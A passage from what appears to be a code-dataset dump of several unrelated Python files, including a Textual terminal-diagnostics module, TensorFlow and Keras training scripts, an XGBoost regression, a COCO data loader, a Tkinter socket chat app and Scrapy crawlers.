Let's check for some of the\n # more common terminal signatures.\n if \"ALACRITTY_WINDOW_ID\" in os.environ:\n term_program = \"Alacritty\"\n elif \"KITTY_PID\" in os.environ:\n term_program = \"Kitty\"\n elif \"WT_SESSION\" in os.environ:\n term_program = \"Windows Terminal\"\n elif \"INSIDE_EMACS\" in os.environ and os.environ[\"INSIDE_EMACS\"]:\n term_program = (\n f\"GNU Emacs {' '.join(os.environ['INSIDE_EMACS'].split(','))}\"\n )\n elif \"JEDITERM_SOURCE_ARGS\" in os.environ:\n term_program = \"PyCharm\"\n\n else:\n # See if we can pull out some sort of version information too.\n term_version = os.environ.get(\"TERM_PROGRAM_VERSION\")\n if term_version is not None:\n term_program = f\"{term_program} ({term_version})\"\n\n return \"*Unknown*\" if term_program is None else term_program\n\n\ndef _env(var_name: str) -> str:\n \"\"\"Get a representation of an environment variable.\n\n Args:\n var_name: The name of the variable to get.\n\n Returns:\n The value, or an indication that it isn't set.\n \"\"\"\n return os.environ.get(var_name, \"*Not set*\")\n\n\ndef _term() -> None:\n \"\"\"Print information about the terminal.\"\"\"\n _section(\n \"Terminal\",\n {\n \"Terminal Application\": _guess_term(),\n \"TERM\": _env(\"TERM\"),\n \"COLORTERM\": _env(\"COLORTERM\"),\n \"FORCE_COLOR\": _env(\"FORCE_COLOR\"),\n \"NO_COLOR\": _env(\"NO_COLOR\"),\n },\n )\n\n\n@singledispatch\ndef _str_rich(value: Any) -> str:\n \"\"\"Convert a rich console option to a string.\n\n Args:\n value: The value to convert to a string.\n\n Returns:\n The string version of the value for output\n \"\"\"\n return str(value)\n\n\n@_str_rich.register\ndef _(value: ConsoleDimensions) -> str:\n return f\"width={value.width}, height={value.height}\"\n\n\ndef _console() -> None:\n \"\"\"Print The Rich console options.\"\"\"\n _section(\n \"Rich Console options\",\n {k: _str_rich(v) for k, v in Console().options.__dict__.items()},\n )\n\n\ndef diagnose() -> None:\n \"\"\"Print information about Textual and its environment to help diagnose problems.\"\"\"\n print(\"\")\n print(\"# Textual Diagnostics\")\n print()\n _versions()\n _python()\n _os()\n _term()\n _console()\n # TODO: Recommended changes. 
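    # (Editor's note: a minimal, self-contained sketch of the
    # functools.singledispatch pattern that _str_rich uses above; the names
    # below are invented for illustration.)
    #
    #     from functools import singledispatch
    #
    #     @singledispatch
    #     def describe(value):                 # generic fallback
    #         return str(value)
    #
    #     @describe.register
    #     def _(value: tuple):                 # override for one concrete type
    #         return f"tuple of {len(value)} items"
    #
    #     describe(42)         # -> '42'
    #     describe((1, 2, 3))  # -> 'tuple of 3 items'
    #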
Given all of the above, make any useful\n # recommendations to the user (eg: don't use Windows console, use\n # Windows Terminal; don't use macOS Terminal.app, etc).\n","sub_path":"src/textual/cli/tools/diagnose.py","file_name":"diagnose.py","file_ext":"py","file_size_in_byte":4514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"218535969","text":"import numpy as np \nimport tensorflow as tf\nimport tensorflow.keras as tfk\nimport os\nfrom glob import glob\n\nimport logging\ntf.get_logger().setLevel(logging.ERROR)\n\nimport utils\nimport augmentation\nimport losses\nimport u_net2\nimport base_cnn\n\nTRAIN_DIR = os.path.join('data','labelled')\nUNLABELLED_TRAIN_DIR = os.path.join('data','unlabelled')\nVALID_DIR = os.path.join('data','valid_labelled')\n\nIMG_DIM = [192, 192]\nNO_CHANNELS = 1\nNO_CLASSES = 4\nNO_DOMAINS = 3\nBATCH_SIZE = 16\nNO_TRAIN_IMAGES = len(glob(os.path.join(TRAIN_DIR,'*sa.nii.gz'))) \nNO_VALID_IMAGES = len(glob(os.path.join(VALID_DIR,'*sa.nii.gz'))) \nNO_TRAIN_STEPS = NO_TRAIN_IMAGES // BATCH_SIZE\nNO_VALID_STEPS = NO_VALID_IMAGES // BATCH_SIZE\nNO_FILTERS = 16\nRES_STEPS = 5\n\nNO_EPOCHS = 1000\n\n# Images in the dataset will be x,y,z,2 (we have 2 time points ED and ES) \n# since we want only one time point as a training example, we can sample \n# randomly during augmentation. We can do the same random sampling from \n# the z direction to get a 2D input.\n# I will take the central 192 x 192 patch for training\n\nin_dim1 = [IMG_DIM[0], IMG_DIM[1], NO_FILTERS]\nin_dim2 = [IMG_DIM[0]//(2**(RES_STEPS-1)), IMG_DIM[1]//(2**(RES_STEPS-1)), NO_FILTERS*(2**RES_STEPS)]\n\ncnn_model = base_cnn.define_dual_cnn(in_dim1, in_dim2, NO_DOMAINS)\nunet_model = u_net2.UNet2D(in_channels=NO_CHANNELS, out_classes=NO_CLASSES, img_shape = [IMG_DIM[0], IMG_DIM[1], NO_CHANNELS], no_filters=NO_FILTERS, resolution_steps=RES_STEPS)\n\nlearning_rate_function_seg = tfk.optimizers.schedules.PiecewiseConstantDecay(boundaries = [150*NO_TRAIN_STEPS, 1000*NO_TRAIN_STEPS], values = [1e-3, 1e-4, 1e-5])\nlearning_rate_function_class = tfk.optimizers.schedules.PiecewiseConstantDecay(boundaries = [150*NO_TRAIN_STEPS, 400*NO_TRAIN_STEPS], values = [1e-3, 1e-4, 1e-5])\n\noptimizer_seg = tfk.optimizers.Adam(learning_rate_function_seg)\noptimizer_class = tfk.optimizers.Adam(learning_rate_function_class)\n\ndice_loss = losses.MultiClassDice()\ndice_plus_xent = losses.MultiClassDiceXent()\ncat_xent = tfk.losses.CategoricalCrossentropy(from_logits=True)\ncat_acc = tf.keras.metrics.CategoricalAccuracy()\n\ndomain_dataset = tf.data.Dataset.from_generator(lambda: utils.get_domain_data(TRAIN_DIR,NO_DOMAINS), (tf.float32, tf.float32, tf.float32), \\\n (tf.TensorShape([None,None,None,None]),tf.TensorShape([None,None,None,None]),tf.TensorShape([None]))).repeat()\ndomain_dataset = domain_dataset.map(lambda x, y, z: augmentation.tf_do_domain_augmentation2(x, y, z, IMG_DIM, NO_CHANNELS, NO_CLASSES, NO_DOMAINS), \n num_parallel_calls=4).batch(BATCH_SIZE,drop_remainder=True).prefetch(1)\nunlabelled_dataset = tf.data.Dataset.from_generator(lambda: utils.get_domain_data_only(UNLABELLED_TRAIN_DIR,NO_DOMAINS), (tf.float32, tf.float32), \\\n (tf.TensorShape([None,None,None,None]), tf.TensorShape([None]))).repeat()\nunlabelled_dataset = unlabelled_dataset.map(lambda x, y: augmentation.tf_do_domain_only_augmentation2(x, y, IMG_DIM, NO_CHANNELS, NO_DOMAINS), \n num_parallel_calls=4).batch(BATCH_SIZE//4,drop_remainder=True).prefetch(1)\ndomain_valid_dataset = 
tf.data.Dataset.from_generator(lambda: utils.get_domain_data(VALID_DIR, NO_DOMAINS), (tf.float32, tf.float32, tf.float32), \\\n (tf.TensorShape([None,None,None,None]),tf.TensorShape([None,None,None,None]),tf.TensorShape([None]))).repeat()\ndomain_valid_dataset = domain_valid_dataset.map(lambda x, y, z: augmentation.tf_do_domain_valid_crop(x, y, z, IMG_DIM, NO_CHANNELS, NO_CLASSES, NO_DOMAINS), \n num_parallel_calls=4).batch(BATCH_SIZE,drop_remainder=True).prefetch(1)\n\nalpha = 0.\nreverse_alpha = tf.constant([-alpha])\n\n@tf.function\ndef train_step_seg(inputs, targets):\n \n with tf.GradientTape() as tape:\n y_ = unet_model(inputs, training=True)\n loss_value = dice_plus_xent(y_true=targets, y_pred=y_)\n \n grads = tape.gradient(loss_value, unet_model.trainable_variables)\n optimizer_seg.apply_gradients(zip(grads, unet_model.trainable_variables))\n\n return loss_value\n\n@tf.function\ndef train_step_class(inputs, targets):\n \n with tf.GradientTape() as tape:\n y_ = cnn_model(inputs, training=True)\n loss_value = cat_xent(y_true=targets, y_pred=y_)\n \n grads = tape.gradient(loss_value, cnn_model.trainable_variables)\n optimizer_class.apply_gradients(zip(grads, cnn_model.trainable_variables))\n\n return loss_value\n\n@tf.function\ndef train_step_adv(inputs, targets):\n with tf.GradientTape() as tape:\n x,y = unet_model.encode(inputs,training=True)\n rep = unet_model.decode(x,y,training=True)\n classified_rep = cnn_model([rep, x] ,training=True)\n loss_value = cat_xent(y_true=targets, y_pred=classified_rep)\n\n grads_adv = tape.gradient(loss_value, unet_model.trainable_variables)\n reversed_grads_adv = [(reverse_alpha*g, v) if ('conv' in v.name) and ('encode' in v.name or 'decode' in v.name) else (g, v) for g, v in zip(grads_adv, unet_model.trainable_variables)]\n optimizer_seg.apply_gradients(reversed_grads_adv)\n \n return loss_value\n\niter_data = iter(domain_dataset)\niter_valid_data = iter(domain_valid_dataset)\niter_unlabel_data = iter(unlabelled_dataset)\nfor epoch in range(NO_EPOCHS):\n epoch_loss_avg_seg = tf.keras.metrics.Mean()\n epoch_loss_avg_class = tf.keras.metrics.Mean()\n epoch_dice = tf.keras.metrics.Mean()\n epoch_class_accuracy = tf.keras.metrics.Mean()\n \n if epoch > 300 and alpha < 1.:\n alpha += 0.0065\n reverse_alpha = tf.constant([-alpha])\n\n for _ in range(NO_TRAIN_STEPS):\n xs, ys, ds = next(iter_data)\n if epoch < 151 or epoch > 300:\n loss_value_seg = train_step_seg(xs, ys)\n epoch_loss_avg_seg.update_state(loss_value_seg)\n\n if epoch > 150:\n xu, du = next(iter_unlabel_data)\n\n x_adv = tf.concat([xs, xu], 0)\n d_adv = tf.concat([ds, du], 0)\n inds = tf.range( BATCH_SIZE + BATCH_SIZE // 4 )\n inds = tf.random.shuffle(inds)\n x_adv = tf.gather(x_adv, inds, axis = 0)\n d_adv = tf.gather(d_adv, inds, axis = 0)\n\n zclass, feats = unet_model.encode(x_adv)\n xclass = unet_model.decode(zclass, feats)\n loss_value_class = train_step_class([xclass, zclass], d_adv)\n epoch_loss_avg_class.update_state(loss_value_class)\n\n if alpha > 0:\n loss_value_adv = train_step_adv(x_adv, d_adv)\n\n y_ = unet_model(xs, training=False)\n epoch_dice.update_state(1 - dice_loss(y_true=ys, y_pred=y_))\n if epoch > 150:\n y_ = cnn_model([xclass, zclass], training=False)\n epoch_class_accuracy.update_state(cat_acc(y_true=d_adv, y_pred=y_))\n else:\n epoch_class_accuracy.update_state(0.0)\n\n epoch_valid_dice = tf.keras.metrics.Mean()\n for _ in range(NO_VALID_STEPS):\n xv, yv, _ = next(iter_valid_data) \n y_ = unet_model(xv, training=False)\n epoch_valid_dice.update_state(1 - 
dice_loss(y_true=yv, y_pred=y_))\n\n if epoch % 50 == 0:\n unet_model.reset_metrics()\n unet_model.save_weights(os.path.join(\"da_seg_model_weights\", \"cp-{:03d}.ckpt\".format(epoch)), save_format = 'tf')\n cnn_model.reset_metrics()\n cnn_model.save_weights(os.path.join(\"da_class_model_weights\", \"cp-{:03d}.ckpt\".format(epoch)), save_format = 'tf')\n\n print(\"Epoch {:03d}: Seg Loss: {:.3f}\".format(epoch, epoch_loss_avg_seg.result()),flush=True)\n print(\"Epoch {:03d}: Class Loss: {:.3f}\".format(epoch, epoch_loss_avg_class.result()),flush=True)\n print(\"Epoch {:03d}: Dice: {:.3f}\".format(epoch, epoch_dice.result()),flush=True)\n print(\"Epoch {:03d}: Class Accuracy: {:.3f}\".format(epoch, epoch_class_accuracy.result()),flush=True)\n print(\"Epoch {:03d}: Validation Dice: {:.3f}\".format(epoch, epoch_valid_dice.result()),flush=True)\n\nunet_model.reset_metrics()\nunet_model.save_weights(os.path.join(\"da_seg_model_weights\", \"cp-final.ckpt\"), save_format = 'tf')\ncnn_model.reset_metrics()\ncnn_model.save_weights(os.path.join(\"da_class_model_weights\", \"cp-final.ckpt\"), save_format = 'tf')\n","sub_path":"da_main.py","file_name":"da_main.py","file_ext":"py","file_size_in_byte":8301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"600166096","text":"import pandas as pd\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nimport xgboost as xgb\n\ndata_df = pd.read_csv('lianjia.csv') \n\ndata_df = data_df.drop('code', axis=1)\n\ny_all = data_df['price']\nX_all = data_df.drop('price', axis=1)\n\nX_train, X_test, y_train, y_test = train_test_split(X_all, y_all, test_size=0.15, random_state=818)\n\n\nreg_model = xgb.XGBRegressor(max_depth=9, # 构建树的深度,越大越容易过拟合\n n_estimators=10, # 最佳迭代次数\n learning_rate=0.1, # 学习率\n n_jobs=-1) # 启动cpu所有核\nreg_model.fit(X_train, # 训练集\n y_train, # 训练集标签\n eval_set=[(X_train, y_train)], # 验证集\n verbose=10, # 训练多少轮打印一次结果\n early_stopping_rounds=10 # 每经过10轮rmse必须下降,否则停止训练\n )\n\ny_pred=reg_model.predict(X_test)\n\ntest_df = pd.DataFrame()\ntest_df['price'] = y_test\ntest_df['p_price'] = y_pred\ntest_df['abs_err'] = abs(test_df['price'] - test_df['p_price'])\ntest_df['rate_err'] = test_df['abs_err'] / test_df['price']\n\nprint('abs err:', test_df['abs_err'].mean())\nprint('rate err:', test_df['rate_err'].mean())\ntest_df.to_csv('test.csv')","sub_path":"h_xgboost_0.01.py","file_name":"h_xgboost_0.01.py","file_ext":"py","file_size_in_byte":1334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"162550835","text":"import torch\nimport torchvision\nfrom torch.utils import data\n\nfrom pycocotools.coco import COCO as COCOapi\n\nimport os.path as path\nimport skimage.io as io\nimport numpy as np\n\nSUBSET_LEN = 50\n\nclass COCO(data.Dataset):\n def __init__(self, root,\n mode= \"train\", # choose between \"train\", \"val\"\n is_subset= False, # If is subset, the length will be a fixed small length\n max_n_objects= 12, # Due to make a batch of data, the one-hot mask has to be consistent\n sort_anns= False, # Due to multiple anns, sort the anns to get masks as big as possible\n ):\n self._root = root\n self._mode = mode\n self._is_subset = is_subset\n self._max_n_objects = max_n_objects\n self._sort_anns= sort_anns\n\n self.coco = COCOapi(\n path.join(self._root, \"annotations/instances_{}2017.json\".format(self._mode))\n )\n # load categories\n self._cats = self.coco.loadCats(self.coco.getCatIds())\n self._catNms = 
list(set([cat['name'] for cat in self._cats]))\n self._supNms = list(set([cat['supercategory'] for cat in self._cats]))\n self._output_mode = dict(catNms= None, is_supcats= False)\n\n # reset self mode to all categories\n self.set_cats()\n\n @property\n def n_objects(self):\n \"\"\" NOTE: this method depends on category mode (refer to set_cats).\n And background is also marked as an object\n \"\"\"\n if self._output_mode[\"is_supcats\"]:\n return len(self._supNms)+1\n else:\n return len(self._catNms)+1\n\n @property\n def all_categories(self):\n return self._cats\n\n @property\n def all_categories_names(self):\n return self._catNms\n\n @property\n def all_super_categories_names(self):\n return self._supNms\n\n def set_cats(self, cats: list= None, is_supcats= True):\n \"\"\" Given category, the dataset will only output all items from that dataset.\n And configure the output mask is in terms of supcats or cats.\n If not provided, all images will be output from __getitem__\n \"\"\"\n self._output_mode[\"catNms\"] = cats\n self._output_mode[\"is_supcats\"] = is_supcats\n\n if self._output_mode[\"catNms\"] is None:\n self.imgIds = self.coco.getImgIds()\n else:\n catNms = self._output_mode[\"catNms\"]\n if self._output_mode[\"is_supcats\"]:\n self.imgIds = self.coco.getImgIds(\n imgIds= self.coco.getImgIds(),\n catIds= self.coco.getCatIds(supNms= catNms)\n )\n else:\n self.imgIds = self.coco.getImgIds(\n imgIds= self.coco.getImgIds(),\n catIds= self.coco.getCatIds(catNms= catNms)\n )\n\n def __len__(self):\n if self._is_subset:\n return SUBSET_LEN\n else:\n return len(self.imgIds)\n\n def __getitem__(self, idx):\n if self._is_subset:\n idx = min(SUBSET_LEN, idx)\n\n try:\n img = self.coco.loadImgs(self.imgIds[idx])[0]\n except:\n raise ValueError(\"Wrong index: {}\".format(idx))\n # This image is in (H, W, C) shape\n image = io.imread('%s/images/%s'%(\n self._root,\n img['file_name']\n )).astype(np.float32)\n\n annIds = self.coco.getAnnIds(imgIds= img[\"id\"])\n anns = self.coco.loadAnns(annIds)\n if self._sort_anns:\n # put the masks with greatest area at 0-th\n anns.sort(key= lambda x: x[\"area\"], reverse= True)\n\n # incase of gray-scale image\n if len(image.shape) == 2:\n image = np.tile(image, (3,1,1)).transpose(1,2,0)\n elif len(image.shape) == 3:\n pass\n else:\n raise ValueError(\"Wrong image shape dimensions\\n{}\".format(str(img)))\n H, W, _ = image.shape\n\n # create a bounding box array with (idx0, idx1, H, W) notion.\n # NOTE: it is a bit different from COCO image for the simplicity\n bboxs = np.zeros((self._max_n_objects, 4), dtype= np.float32)\n mask = np.zeros((H, W, self._max_n_objects), dtype= np.uint8)\n bg = np.ones((H, W, 1), dtype= np.uint8) # a background\n\n n_objects = 0\n for ann_i, ann in enumerate(anns):\n \"\"\" Because of the multi-object tracking problem, there is no need to assign to\n specific index.\n \"\"\"\n if n_objects >= self._max_n_objects: break\n\n ann_mask = self.coco.annToMask(ann)\n mask[:, :, ann_i] = ann_mask\n bg[:, :, 0] &= (1-ann_mask)\n\n coco_box = ann[\"bbox\"]\n bboxs[ann_i, 0] = coco_box[1]\n bboxs[ann_i, 1] = coco_box[0]\n bboxs[ann_i, 2] = coco_box[3]\n bboxs[ann_i, 3] = coco_box[2]\n\n n_objects += 1\n mask = np.concatenate([bg, mask], axis= 2)\n\n # make the output with dimension order: (C, H, W)\n # NOTE: each data might not have the same resolution\n image = image.transpose(2,0,1).astype(np.float32) / 255\n mask = mask.transpose(2,0,1).astype(np.uint8)\n return dict(\n image= torch.from_numpy(image), # pixel in [0, 1] scale\n mask= 
torch.from_numpy(mask), # NOTE: 0-th dimension of mask is (n_cats+1), \n # the order of the mas depends on self._supNms or self._catNms\n n_objects= torch.tensor(n_objects),\n )\n\nif __name__ == \"__main__\":\n # test code\n import ptvsd\n import sys\n # ip_address = ('0.0.0.0', 5050)\n # print(\"Process: \" + \" \".join(sys.argv[:]))\n # print(\"Is waiting for attach at address: %s:%d\" % ip_address, flush= True)\n # # Allow other computers to attach to ptvsd at this IP address and port.\n # ptvsd.enable_attach(address=ip_address, redirect_output= True)\n # # Pause the program until a remote debugger is attached\n # ptvsd.wait_for_attach()\n # print(\"Process attached, start running into experiment...\", flush= True)\n # ptvsd.break_into_debugger()\n\n root = sys.argv[1]\n dataset = COCO(root)\n\n dataloader = data.DataLoader(dataset,\n batch_size=128, \n shuffle= True, \n num_workers= 48\n )\n\n for i, b in enumerate(dataloader):\n print(\"Get a batch, {}: type({})\".format(i, type(b)))\n\n print(\"debug done...\")\n \n\n ","sub_path":"vos/datasets/COCO.py","file_name":"COCO.py","file_ext":"py","file_size_in_byte":6397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"229357764","text":"import scrapy\nfrom scrapy.crawler import CrawlerProcess\nfrom spider_malaysiakini import MKiniSpider\n\nfrom twisted.internet import reactor\nfrom twisted.internet.task import deferLater\n\ndef crash(failure):\n print('oops, spider crashed')\n print(failure.getTraceback())\n \ndef sleep(self, *args, seconds):\n \"\"\"Non blocking sleep callback\"\"\"\n return deferLater(reactor, seconds, lambda: None)\n\nprocess = CrawlerProcess()\nwait_time = 60*10\n\ndef _crawl(result, spider):\n deferred = process.crawl(spider)\n deferred.addCallback(lambda results: print('waiting {} seconds before restart...'.format(wait_time)))\n deferred.addErrback(crash) # <-- add errback here\n deferred.addCallback(sleep, seconds=wait_time) # wait 10 minutes\n deferred.addCallback(_crawl, spider)\n return deferred\n\n_crawl(None, MKiniSpider) # Infinite crawl\nprocess.start()\n\n","sub_path":"Spider/archive/run_malaysiakini_crawler.py","file_name":"run_malaysiakini_crawler.py","file_ext":"py","file_size_in_byte":866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"90089478","text":"#!/usr/bin/env python3\n\nimport socket\nimport threading\nimport tkinter\nimport time\nfrom tkinter import ttk\nfrom queue import Queue\n\nINPUT_PORT = 38802\nOUTPUT_PORT = 38801\nSIZE = 1024\n\nclass Client(threading.Thread):\n\n def __init__(self, queue):\n super().__init__()\n self.daemon = True\n self.queue = queue\n\n def run(self):\n while True:\n msg = self.queue.get()\n server = socket.socket()\n host = socket.gethostname()\n server.connect((host, OUTPUT_PORT))\n server.send(bytes(msg, \"utf-8\"))\n server.close()\n\nclass Server(threading.Thread):\n\n def __init__(self, client, addr, queue):\n super().__init__()\n self.client = client\n self.addr = addr\n self.queue = queue\n self.daemon = True\n\n def run(self):\n while True:\n msg = self.client.recv(SIZE)\n if not msg:\n break\n self.queue.put(msg.decode(\"utf-8\"))\n self.client.close()\n\nclass HandleRequest(threading.Thread):\n\n def __init__(self, queue):\n super().__init__()\n self.queue = queue\n self.daemon = True\n self.server = socket.socket()\n self.host = socket.gethostname()\n\n def run(self):\n self.server.bind((self.host, INPUT_PORT))\n self.server.listen(5)\n while 
True:\n client, addr = self.server.accept()\n server_thread = Server(client, addr, self.queue)\n server_thread.start()\n \n\nclass MainWindow(tkinter.Frame):\n\n def __init__(self, parent):\n super().__init__(parent)\n self.parent = parent\n self.parent.title(\"První GUI aplikace\")\n self.parent.rowconfigure(0, weight=700)\n self.parent.rowconfigure(1, weight=200)\n self.parent.rowconfigure(2, weight=100)\n self.parent.columnconfigure(0, weight=800)\n self.parent.columnconfigure(1, weight=100)\n self.parent.columnconfigure(2, weight=100)\n self.create_widgets()\n self.in_queue = Queue()\n self.out_queue = Queue()\n self.client_thread = Client(self.out_queue)\n self.client_thread.start()\n self.server_thread = HandleRequest(self.in_queue)\n self.server_thread.start()\n self.check_message()\n\n def create_widgets(self):\n self.scroll_bar_y = ttk.Scrollbar(orient = tkinter.VERTICAL)\n self.scroll_bar_x = ttk.Scrollbar(orient = tkinter.HORIZONTAL)\n self.notepad = tkinter.Text(undo = True,\n state = \"disabled\",\n wrap = tkinter.NONE,\n yscrollcommand = self.scroll_bar_y.set,\n xscrollcommand = self.scroll_bar_x.set,\n )\n self.entry = tkinter.Entry(text=\"\")\n self.button = ttk.Button(text=\"Odeslat\")\n \n self.button[\"command\"] = self.send_message\n self.scroll_bar_y[\"command\"] = self.notepad.yview\n self.scroll_bar_x[\"command\"] = self.notepad.xview\n\n self.notepad.grid(row=0, column=0, columnspan=2, sticky=tkinter.NSEW, padx=2, pady=2)\n self.scroll_bar_y.grid(row=0, column=2, sticky=tkinter.NS)\n self.scroll_bar_x.grid(row=1, column=0, columnspan=2, sticky=tkinter.EW)\n self.entry.grid(row=2, column=0, sticky=tkinter.NSEW, padx=2)\n self.button.grid(row=2, column=1, columnspan=2, sticky=tkinter.NSEW)\n\n def check_message(self):\n if not self.in_queue.empty():\n text = self.in_queue.get()\n self.notepad.configure(state=\"normal\")\n self.notepad.insert(tkinter.END, \"<<< \"+text+\"\\n\")\n self.notepad.configure(state=\"disabled\")\n self.parent.after(100, self.check_message)\n\n def send_message(self):\n text = self.entry.get()\n if text:\n self.out_queue.put(text)\n self.notepad.configure(state=\"normal\")\n self.notepad.insert(tkinter.END, \">>> \"+text+\"\\n\")\n self.notepad.configure(state=\"disabled\")\n \n\nroot = tkinter.Tk()\napp = MainWindow(root)\napp.mainloop()\n","sub_path":"test-gui–2.py","file_name":"test-gui–2.py","file_ext":"py","file_size_in_byte":4161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"199156604","text":"import numpy as np\nimport sys\n\nfrom keras.callbacks import ModelCheckpoint, EarlyStopping\n\nsys.path.append(\".\")\nimport pandas as pd\n\nimport logging\n\nfrom src.steps.augumentation.augmentors import adjust_gamma_dark, night_effect, add_random_shadow, \\\n augment_brightness_camera_images, horizontal_flip\nfrom src.steps.models.nvidia_autopilot import model_categorical\n\nlogging.basicConfig(format='%(levelname)s: %(message)s', level=logging.INFO)\nlogging.basicConfig(format='%(levelname)s: %(message)s', level=logging.DEBUG)\nlogging.basicConfig(format='%(levelname)s: %(message)s', level=logging.ERROR)\n\ndef Augment(image, steer):\n if np.random.random() > 0.75:\n image = adjust_gamma_dark(image)\n elif np.random.random() > 0.75:\n image = night_effect(image)\n elif np.random.random() > 0.75:\n image = add_random_shadow(image)\n elif np.random.random() > 0.75:\n image = augment_brightness_camera_images(image)\n elif np.random.random() > 0.75:\n image = 
augment_brightness_camera_images(image)\n image = add_random_shadow(image)\n image, steer = horizontal_flip(image, steer)\n\n return image, steer\n\n\n\n#from keras.callbacks import EarlyStopping, ModelCheckpoint\n\n# \"optimizer\"\n# \"loss\"\n# \"metrics\"\nfrom src.steps.core.parameters import pipeline_parameters\nfrom sklearn.model_selection import train_test_split\nfrom src.steps.core.datasets import DatasetStorage, DatasetInfo, OneDatasetInMemorySampleGenerator\n\n###################################\n# LOAD DATASETS INFORMATION\n###################################\n\n# 0 axionaut-axionable_data data/datasets\\axionaut-axionable_data (90, 250, 3) 26449 26434\n# 1 axionaut-ironcar_data-new_track data/datasets\\axionaut-ironcar_data-new_track (90, 250, 3) 1519 0\n# 2 axionaut-ironcar_data-old_track data/datasets\\axionaut-ironcar_data-old_track (90, 250, 3) 16028 0\n# 3 axionaut-new data/datasets\\axionaut-new (90, 250, 3) 3169 0\n# 4 ironcar-friend-shared data/datasets\\ironcar-friend-shared (150, 250, 3) 4074 0\n# 5 ironcar-shared data/datasets\\ironcar-shared (150, 250, 3) 4545 0\n\ndatasets_storage = DatasetStorage(pipeline_parameters[\"datasets_path\"], ds_filter=[\"axionaut-axionable_data\", \"ironcar-shared\"])\ndatasets_infos = datasets_storage.get_datasets_infos()\ndatasets = datasets_storage.get_datasets()\n\nprint(\"==================\\n Datasets\\n==================\\n\")\nprint(pd.DataFrame(map(lambda x: x.__dict__, datasets_infos))[[\"name\", \"path\", \"image_size\", \"samples_count\", \"corrected_samples_count\"]])\n\n# Check dataset dimensions\ndf_dims = pd.DataFrame(map(lambda x: x.image_size, datasets_infos))\ndf_dims.columns = [\"H\", \"W\", \"B\"]\ncrop_window = []\nfor dim in df_dims.columns:\n widths = df_dims[dim].unique()\n if len(widths) > 1:\n logging.info(\"Datasets have different {} dimensions will automatically crop to minimal:\".format(dim) + str(np.min(widths)))\n crop_window.append(np.min(widths))\n\ncrop_window = tuple(crop_window)\nlogging.info(\"Crop window is {}\".format(crop_window))\n\n###################################\n# SPLIT TRAIN / TEST\n###################################\nsample_generator = OneDatasetInMemorySampleGenerator(dataset_storage=datasets_storage)\nlarge_index = sample_generator.get_mlutidataset_index()\n\nindex_train, index_test = train_test_split(large_index, test_size=0.15)\n\nnum_train = len(index_train)\nnum_valid = len(index_test)\n\n###################################\n# BUILD A LAZY GENERATOR\n###################################\ntrain_generator = OneDatasetInMemorySampleGenerator(dataset_storage=datasets_storage)\ntest_generator = OneDatasetInMemorySampleGenerator(dataset_storage=datasets_storage)\n\n###################################\n# BUILD A MODEL\n###################################\nmodel = model_categorical(input_size=crop_window)\nmodel.summary()\n\nmodel.compile(\n optimizer=pipeline_parameters[\"optimizer\"],\n loss=pipeline_parameters[\"loss\"],\n metrics=pipeline_parameters['metrics'])\n\n###################################\n# TRAINING PARAMS\n###################################\nearly_stop = EarlyStopping(\n monitor='val_loss',\n min_delta=0.0005,\n patience=5,\n mode='auto',\n verbose=1)\n\ncheckpoint = ModelCheckpoint(\n pipeline_parameters[\"checkpoint.filename\"],\n monitor=pipeline_parameters['checkpoint.monitor'],\n verbose=pipeline_parameters[\"checkpoint.verbose\"],\n save_best_only=pipeline_parameters[\"checkpoint.save_best_only\"],\n mode=pipeline_parameters[\"checkpoint.mode\"],\n 
period=pipeline_parameters[\"checkpoint.period\"])\n\n# batch generator\nBATCH_SIZE = pipeline_parameters[\"BATCH_SIZE\"]\n\n###################################\n# FIT\n###################################\nmodel.fit_generator(\n generator = train_generator.sample_generator(BATCH_SIZE, shuffle=False, index_subset=index_train, crop=crop_window),\n samples_per_epoch = num_train,\n nb_epoch = pipeline_parameters[\"nb_epoch\"],\n verbose = 1,\n validation_data = test_generator.sample_generator(BATCH_SIZE, shuffle=False, index_subset=index_test, crop=crop_window),\n nb_val_samples = num_valid,\n callbacks = [early_stop, checkpoint])\n\n","sub_path":"src/steps/pipelines/standard_pipeline_2018.py","file_name":"standard_pipeline_2018.py","file_ext":"py","file_size_in_byte":5424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"265871830","text":"# -*- coding: utf-8 -*-\n\n'''\nCreated on 2019-Jun-18 09:24:01\nTICKET NUMBER -AI_32\n@author: muhil\n'''\n\nfrom scrapy.spiders import CSVFeedSpider\nfrom scrapy.loader import ItemLoader\nfrom scrapy.loader.processors import MapCompose\nfrom w3lib.html import remove_tags, replace_escape_chars\n\nfrom Data_scuff.spiders.AI_32.items import NySosCompaniesBusinessLicensesSpiderItem\nfrom Data_scuff.spiders.__common import CustomSettings\nfrom Data_scuff.spiders.__common import DataFormatterMixin,LookupDatareaderMixin\nfrom Data_scuff.utils.utils import Utils\n\n\n\nclass NySosCompaniesBusinessLicensesSpider(CSVFeedSpider,LookupDatareaderMixin, DataFormatterMixin):\n name = '32_ny_sos_companies_business_licenses'\n allowed_domains = ['ny.gov']\n start_urls = ['https://data.ny.gov/api/views/n9v6-gdp6/rows.csv?accessType=DOWNLOAD']\n # start_urls = ['file:///home/muhil/Downloads/Active_Corporations___Beginning_1800.csv']\n\n # headers = ['id', 'name', 'description', 'image_link']\n # delimiter = '\\t'\n \n custom_settings = {\n 'FILE_NAME':Utils.getRundateFileName('AI-32_Companies_SOS_NY_CurationReady'),\n 'JIRA_ID':'AI_32',\n 'DOWNLOAD_DELAY':0.2,\n 'COOKIES_ENABLED':True,\n 'COOKIES_DEBUG':True,\n 'HTTPCACHE_ENABLED':False,\n # 'CSV_DELIMITER':'|',\n 'DOWNLOADER_MIDDLEWARES':CustomSettings.appenDownloadMiddlewarevalues({\n 'scrapy.downloadermiddlewares.httpcompression.HttpCompressionMiddleware':None,\n 'Data_scuff.middleware.httpcompression.CustomHttpCompressionMiddleWare':590,\n }),\n # 'JOBDIR' : 